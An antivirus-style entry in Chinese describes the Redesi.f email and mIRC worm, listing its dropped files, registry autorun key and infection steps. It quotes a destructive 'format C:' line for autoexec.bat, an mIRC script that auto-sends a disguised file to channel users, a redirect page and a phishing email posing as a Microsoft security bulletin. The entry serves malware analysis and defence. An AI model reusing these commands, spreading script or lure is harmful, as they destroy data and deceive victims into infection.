基本信息

病毒行为

基本信息

病毒别名：I-Worm.Redesi.f [AVP],I-Worm/Redesi.f [KV],Worm.Redesi.f[RS]

处理时间：

威胁级别：★★

中文名称：红丝带变种F

病毒类型：蠕虫

影响系统：Win9x / WinNT

病毒行为

这是一个通过电子邮件和mIRC传播的蠕虫病毒。该病毒发作的时候会弹出一个Windows更新成功的消息框来欺骗用户，并将病毒的5个副本拷贝到C盘根目录下，在注册表中添加启动项，实现病毒的开机自启动。病毒还会向C:\\autoexec.bat中写入2条批处理命令，一条显示“With a fool no season spend, or be counted as his freind.”，另一条则是格式化C盘。通过更改mIRC的脚本配置文件，使得mIRC系统与病毒文件建立联系，扩展病毒的传播途径。病毒还会生成一个html文件C:\\inetpub\\wwwroot\\default.htm，当用户打开该页面的时候，就会打开病毒文件。该病毒在Outlook Express的地址薄里面收集邮件地址，再以Microsoft的名义将病毒做为附件发送出去，该邮件极具欺骗性，用户很可能会受骗而去打开附件，从而感染该病毒。

1)在C盘根目录下建立病毒的多个副本（都是隐藏文件）：

C:\\Commond.exe

C:\\MAPI.exe

C:\\Sysupdate.exe

C:\\UserConfig.exe

C:\\disksync.exe

2)在注册表中为病毒的自启动添加启动项：

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

"Desire"="C:\\commond.exe"

在KEY_LOCAL_MACHINE\\Software\\Microsoft下添加键值：

"Desire"="Done"

3)向C:\\autoexec.bat写入以下内容：

ECHO With a fool no season spend, or be counted as his freind.

format C: /autotest

4)向C:\\mirc\\script.ini写入以下内容：

[script]

n0= on 1:JOIN:#:{

n1= .msg $nick Dear User. Please apply this patch that will protect you from UDP flooding. If you are running a Linux IRC client this update is not needed due to kernel filtering. Regards. Dalnet / Undernet staff.

n2= .copy C:\\MAPI.exe C:\\mirc\\IRCUpdate.IRC.pif

n3= .dcc send $nick C:\\mirc\\IRCUpdate.IRC.pif

n4= }

5)建立文件：

C:\\inetpub\\wwwroot\\Web.exe

生成对应该文件的网页文件：

C:\\inetpub\\wwwroot\\default.htm

该文件的内容如下：

META http-equiv="refresh" content="0; url=Web.exe"

A href="./Web.exe"

h3

We Are Forever

/h3

/A

6)取下面的某一行做为邮件的主题：

FW: Windows at Risk.

FW: Buffer overflow could cause IT meltdown.

FW: Insufficient bounds chcecking cause buffer over run.

FW: Executable stack could cost IT sector millions.

FW: Invalid instruction causes AX and BX registers to differ.

FW: Terrorists release computer virus.

FW: Microsoft and C.E.R.T Corobaration

FW: Stack overrun can cause data loss on first bootable disk

FW: Microsoft Update. Final Release Candidate.

FW: Redesi worm. MAPI update..

7)邮件：

Hey. Sorry I've not emailed you for a while ... well I am now.

Just letting you know I'll be sending an attachment in my next email,so you don't have to worry. I know you can't be too carefull with these virii around, but this is OK.

Speak to you later.

Hey

Well, here is the email I told you I was going to send.

I'll speak to you more later. The boss is comming.

-----Original Message-----

From: Microsoft Security List [mailto:security@microsoft.com]

Sent: 25 October 2001 12:03

Subject: Buffer overflow

Dear Subscriber

Due to insufficient bounds checking in the Windows Messaging API

any value stores in the AX and BX registers(and their register halves

any XOR (compare) operation against these to registers or the h and l register halfs

will always return and value of 1, causing the JNE instruction to execute.

We consider this a HIGH RISK vulnerability,and any computer hacker having any

knowledge of the assembly language could write a working egg to exploit this flaw.

It is highly advised that you install the attached MAPI update to stop any subsequent security breach.

Regards

Microsoft Support

8)取下面的某一个名字做为附件名：

Commond.exe

MAPI.exe

Sysupdate.exe

UserConfig.exe

disksync.exe